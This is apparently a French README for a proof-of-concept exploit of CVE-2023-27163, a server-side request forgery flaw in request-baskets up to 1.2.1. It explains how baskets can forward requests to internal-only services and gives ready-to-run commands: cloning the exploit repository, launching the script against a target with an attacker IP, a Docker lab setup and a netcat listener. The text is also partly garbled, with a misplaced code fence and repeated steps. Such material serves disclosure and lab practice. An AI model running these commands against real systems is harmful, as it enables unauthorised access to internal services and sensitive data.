
Preuve de concept pour la falsification de requête côté serveur (SSRF) dans request-baskets (V<= v.1.2.1)
Ce dépôt contient une preuve de concept (PoC) pour CVE-2023-27163, une vulnérabilité de falsification de requête côté serveur (SSRF) découverte dans request-baskets jusqu'à la version 1.2.1. Cette vulnérabilité permet aux attaquants d'accéder aux ressources réseau et aux informations sensibles en exploitant le composant /api/baskets/{name} via une requête API manipulée.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets est une application web conçue pour collecter et enregistrer les requêtes sur une route spécifique, appelée basket. Lors de sa création, l'utilisateur peut spécifier un autre serveur pour transférer la requête. Le problème ici est que l'utilisateur peut spécifier des services non intentionnels, tels que des applications fermées au réseau.
Par exemple : supposons que le serveur héberge Request-baskets (port 55555) et un serveur web Flask sur le port 8000. Le serveur Flask est également configuré pour n'interagir qu'avec localhost. En créant un basket qui transfère vers http://localhost:8000, l'attaquant peut accéder au serveur web Flask auparavant restreint.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. Télécharger la PoC
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/